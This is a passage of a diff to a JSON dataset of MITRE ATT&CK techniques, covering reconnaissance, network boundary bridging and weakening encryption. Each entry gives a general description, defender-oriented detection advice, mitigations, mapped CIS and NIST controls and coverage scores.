-                "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1592.002",
-                "name": "Gather Victim Host Information: Software",
-                "url": "https://attack.mitre.org/techniques/T1592/002",
-                "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-                "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
+        "is_subtechnique": true,
+        "supertechnique": "T1598",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1592.003",
-                "name": "Gather Victim Host Information: Firmware",
-                "url": "https://attack.mitre.org/techniques/T1592/003",
-                "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             },
             {
-                "tid": "T1592.004",
-                "name": "Gather Victim Host Information: Client Configurations",
-                "url": "https://attack.mitre.org/techniques/T1592/004",
-                "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-                "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.05476190476190476,
-        "adjusted_score": 0.05476190476190476,
+        "cumulative_score": 0.15476190476190477,
+        "adjusted_score": 0.15476190476190477,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
+        "has_splunk": false,
+        "cis_controls": [
+            "14.1",
+            "14.2",
+            "14.6"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "IA-9",
+            "SC-20",
+            "SC-44",
+            "SC-7",
+            "SI-3",
+            "SI-4",
+            "SI-8"
+        ],
         "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0047619047619047615,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1593",
-        "name": "Search Open Websites/Domains",
-        "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
-        "url": "https://attack.mitre.org/techniques/T1593",
+        "tid": "T1599",
+        "name": "Network Boundary Bridging",
+        "description": "Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nDevices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.\n\nWhen an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.",
+        "url": "https://attack.mitre.org/techniques/T1599",
         "tactics": [
-            "Reconnaissance"
+            "Defense Evasion"
         ],
-        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "detection": "Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.\n\nMonitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.",
         "platforms": [
-            "PRE"
+            "Network"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
-        "data_sources": [],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1593.001",
-                "name": "Search Open Websites/Domains: Social Media",
-                "url": "https://attack.mitre.org/techniques/T1593/001",
-                "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+                "tid": "T1599.001",
+                "name": "Network Boundary Bridging: Network Address Translation Traversal",
+                "url": "https://attack.mitre.org/techniques/T1599/001",
+                "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities",
+                "detection": "Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.",
                 "mitigations": [
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1593.002",
-                "name": "Search Open Websites/Domains: Search Engines",
-                "url": "https://attack.mitre.org/techniques/T1593/002",
-                "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
-                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
+                        "mid": "M1043",
+                        "name": "Credential Access Protection",
+                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                        "url": "https://attack.mitre.org/mitigations/M1043"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1032",
+                        "name": "Multi-factor Authentication",
+                        "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                        "url": "https://attack.mitre.org/mitigations/M1032"
+                    },
+                    {
+                        "mid": "M1027",
+                        "name": "Password Policies",
+                        "description": "Set and enforce secure password policies for accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1027"
+                    },
                     {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
+        "cumulative_score": 0.3547619047619048,
+        "adjusted_score": 0.3547619047619048,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
-        "nist_controls": [],
+        "cis_controls": [
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8",
+            "12.2",
+            "13.4"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": false,
-        "network_coverage": false,
+        "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {},
+        "actionability_score": {
+            "combined_score": 0.3047619047619048,
+            "mitigation_score": 0.5818181818181818
+        },
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1594",
-        "name": "Search Victim-Owned Websites",
-        "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
-        "url": "https://attack.mitre.org/techniques/T1594",
+        "tid": "T1599.001",
+        "name": "Network Boundary Bridging: Network Address Translation Traversal",
+        "description": "Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.\n\nNetwork devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)\n\nWhen an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  \n\nAdversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities",
+        "url": "https://attack.mitre.org/techniques/T1599/001",
         "tactics": [
-            "Reconnaissance"
+            "Defense Evasion"
         ],
-        "detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.",
+        "detection": "Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.\n\nMonitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.",
         "platforms": [
-            "PRE"
+            "Network"
         ],
         "data_sources": [
-            "Application Log: Application Log Content"
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1599",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1056",
-                "name": "Pre-compromise",
-                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1056"
+                "mid": "M1043",
+                "name": "Credential Access Protection",
+                "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
+                "url": "https://attack.mitre.org/mitigations/M1043"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            },
+            {
+                "mid": "M1027",
+                "name": "Password Policies",
+                "description": "Set and enforce secure password policies for accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1027"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             }
         ],
-        "cumulative_score": 0.05476190476190476,
-        "adjusted_score": 0.05476190476190476,
+        "cumulative_score": 0.3595238095238095,
+        "adjusted_score": 0.3595238095238095,
         "has_car": false,
-        "has_sigma": false,
+        "has_sigma": true,
         "has_es_siem": false,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.2",
+            "4.4",
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.4",
+            "6.5",
+            "6.8",
+            "12.2",
+            "13.4"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-5",
+            "SC-28",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-4",
+            "SI-7"
+        ],
         "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.0047619047619047615,
-            "detection_score": 0.01
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1595",
-        "name": "Active Scanning",
-        "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
-        "url": "https://attack.mitre.org/techniques/T1595",
+        "tid": "T1600",
+        "name": "Weaken Encryption",
+        "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)",
+        "url": "https://attack.mitre.org/techniques/T1600",
         "tactics": [
-            "Reconnaissance"
+            "Defense Evasion"
         ],
-        "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "detection": "There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.",
         "platforms": [
-            "PRE"
+            "Network"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow"
+            "File: File Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1595.001",
-                "name": "Active Scanning: Scanning IP Blocks",
-                "url": "https://attack.mitre.org/techniques/T1595/001",
-                "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
-                "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "tid": "T1600.001",
+                "name": "Weaken Encryption: Reduce Key Space",
+                "url": "https://attack.mitre.org/techniques/T1600/001",
+                "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)",
